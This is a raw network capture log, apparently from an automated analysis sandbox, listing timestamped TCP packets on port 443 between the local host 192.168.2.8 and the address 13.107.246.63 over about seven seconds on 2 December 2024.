                                                                                                                                                                                                        Dec 2, 2024 07:39:14.715677977 CET49896443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.715683937 CET4434989613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.716214895 CET49896443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.716219902 CET4434989613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.716484070 CET49894443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.716494083 CET4434989413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.716850042 CET49894443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.716860056 CET4434989413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.969645023 CET4434989313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.969715118 CET4434989313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.969786882 CET49893443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.969995975 CET49893443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.970014095 CET4434989313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.970024109 CET49893443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.970031023 CET4434989313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.973656893 CET49898443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.973683119 CET4434989813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.973743916 CET49898443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.973932981 CET49898443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.973943949 CET4434989813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.027720928 CET4434989513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.027816057 CET4434989513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.027863979 CET49895443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.028114080 CET49895443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.028132915 CET4434989513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.028143883 CET49895443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.028150082 CET4434989513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.031864882 CET49899443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.031894922 CET4434989913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.031985044 CET49899443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.032207966 CET49899443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.032219887 CET4434989913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.110333920 CET4434989613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.110429049 CET4434989613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.110485077 CET49896443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.110666990 CET49896443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.110677004 CET4434989613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.110687017 CET49896443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.110692024 CET4434989613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.113815069 CET49900443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.113852024 CET4434990013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.113929987 CET49900443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.114124060 CET49900443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.114137888 CET4434990013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.139472961 CET4434989413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.139534950 CET4434989413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.139591932 CET49894443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.139741898 CET49894443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.139750004 CET4434989413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.139763117 CET49894443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.139766932 CET4434989413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.142359018 CET49901443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.142395973 CET4434990113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.142482042 CET49901443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.142601967 CET49901443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.142616034 CET4434990113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.909521103 CET4434989713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.910212040 CET49897443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.910254955 CET4434989713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.910810947 CET49897443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:15.910816908 CET4434989713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.354795933 CET4434989713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.354865074 CET4434989713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.355073929 CET49897443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.355371952 CET49897443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.355392933 CET4434989713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.355407000 CET49897443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.355412006 CET4434989713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.358925104 CET49902443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.358958960 CET4434990213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.359041929 CET49902443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.359224081 CET49902443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.359234095 CET4434990213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.753679991 CET4434989813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.755255938 CET49898443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.755270004 CET4434989813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.755795002 CET49898443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.755799055 CET4434989813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.856653929 CET4434990113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.860558987 CET49901443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.860599041 CET4434990113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.861538887 CET49901443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.861545086 CET4434990113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.883553982 CET4434989913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.884315014 CET49899443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.884339094 CET4434989913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.884860992 CET49899443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.884866953 CET4434989913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.893337011 CET4434990013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.893692017 CET49900443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.893718004 CET4434990013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.894119024 CET49900443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:16.894124031 CET4434990013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.203064919 CET4434989813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.203088045 CET4434989813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.203140974 CET4434989813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.203181028 CET49898443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.203216076 CET49898443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.203495979 CET49898443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.203510046 CET4434989813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.203537941 CET49898443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.203543901 CET4434989813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.206763983 CET49903443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.206804037 CET4434990313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.206885099 CET49903443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.207120895 CET49903443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.207132101 CET4434990313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.296749115 CET4434990113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.296787024 CET4434990113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.296897888 CET49901443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.296925068 CET4434990113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.297198057 CET49901443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.297211885 CET4434990113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.297219992 CET49901443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.297455072 CET4434990113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.297521114 CET4434990113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.297564030 CET49901443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.300326109 CET49904443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.300350904 CET4434990413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.300426960 CET49904443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.300607920 CET49904443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.300618887 CET4434990413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.336489916 CET4434989913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.336570024 CET4434989913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.336639881 CET49899443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.336886883 CET49899443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.336904049 CET4434989913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.336915970 CET49899443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.336920977 CET4434989913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.337297916 CET4434990013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.337371111 CET4434990013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.337428093 CET49900443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.337503910 CET49900443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.337517023 CET4434990013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.337527990 CET49900443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.337532997 CET4434990013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.340568066 CET49905443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.340596914 CET4434990513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.340617895 CET49906443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.340635061 CET4434990613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.340672016 CET49905443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.340692043 CET49906443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.340797901 CET49905443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.340810061 CET4434990513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.340847969 CET49906443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:17.340861082 CET4434990613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.138588905 CET4434990213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.139345884 CET49902443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.139367104 CET4434990213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.139913082 CET49902443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.139919043 CET4434990213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.587758064 CET4434990213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.587779045 CET4434990213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.587933064 CET49902443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.587949038 CET4434990213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.588018894 CET49902443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.588277102 CET49902443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.588277102 CET49902443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.588284016 CET4434990213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.588438988 CET4434990213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.588469982 CET4434990213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.588526964 CET49902443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.591650009 CET49907443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.591674089 CET4434990713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.591753960 CET49907443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.591948032 CET49907443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:18.591957092 CET4434990713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.057455063 CET4434990613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.058105946 CET4434990513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.058209896 CET49906443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.058223009 CET4434990613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.058434963 CET49905443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.058449030 CET4434990513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.058760881 CET49906443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.058764935 CET4434990613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.058924913 CET49905443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.058929920 CET4434990513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.063251019 CET4434990313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.063575029 CET49903443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.063601017 CET4434990313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.063997984 CET49903443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.064002991 CET4434990313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.081103086 CET4434990413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.081762075 CET49904443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.081778049 CET4434990413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.082591057 CET49904443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.082597017 CET4434990413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.491436958 CET4434990613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.493794918 CET4434990513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.494776011 CET4434990613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.494848013 CET49906443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.494908094 CET49906443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.494920015 CET4434990613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.494940996 CET49906443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.494946003 CET4434990613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.496936083 CET4434990513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.497005939 CET49905443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.497199059 CET49905443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.497210026 CET4434990513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.497253895 CET49905443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.497258902 CET4434990513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.498541117 CET49908443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.498584032 CET4434990813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.498660088 CET49908443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.498817921 CET49908443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.498832941 CET4434990813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.499330997 CET49909443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.499356985 CET4434990913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.499434948 CET49909443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.499555111 CET49909443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.499564886 CET4434990913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.522783041 CET4434990313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.522806883 CET4434990313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.522866011 CET4434990313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.522895098 CET49903443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.522937059 CET49903443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.523099899 CET49903443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.523113966 CET4434990313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.523125887 CET49903443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.523130894 CET4434990313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.525248051 CET4434990413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.525933981 CET49910443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.525950909 CET4434991013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.526017904 CET49910443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.526163101 CET49910443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.526176929 CET4434991013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.528434038 CET4434990413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.528495073 CET49904443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.528547049 CET49904443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.528556108 CET4434990413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.528567076 CET49904443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.528570890 CET4434990413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.530720949 CET49911443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.530739069 CET4434991113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.530855894 CET49911443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.530970097 CET49911443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:19.530980110 CET4434991113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.307470083 CET4434990713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.308160067 CET49907443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.308176994 CET4434990713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.308686972 CET49907443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.308691978 CET4434990713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.744801044 CET4434990713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.746066093 CET4434990713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.746185064 CET49907443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.746217966 CET49907443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.746227026 CET4434990713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.746238947 CET49907443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.746243954 CET4434990713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.749242067 CET49912443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.749274015 CET4434991213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.749350071 CET49912443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.749509096 CET49912443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:20.749525070 CET4434991213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.252695084 CET4434991113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.253392935 CET49911443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.253411055 CET4434991113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.253916979 CET49911443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.253921986 CET4434991113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.305486917 CET4434991013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.331228971 CET49910443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.331288099 CET4434991013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.331737041 CET49910443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.331743956 CET4434991013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.346349001 CET4434990813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.346924067 CET49908443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.346941948 CET4434990813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.347455025 CET49908443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.347459078 CET4434990813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.349312067 CET4434990913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.380672932 CET49909443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.380691051 CET4434990913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.381217003 CET49909443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.381222963 CET4434990913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.688813925 CET4434991113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.691924095 CET4434991113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.691979885 CET49911443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.692467928 CET49911443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.692481995 CET4434991113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.692496061 CET49911443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.692501068 CET4434991113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.697103024 CET49913443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.697141886 CET4434991313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.697213888 CET49913443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:21.697770119 CET49913443192.168.2.813.107.246.63
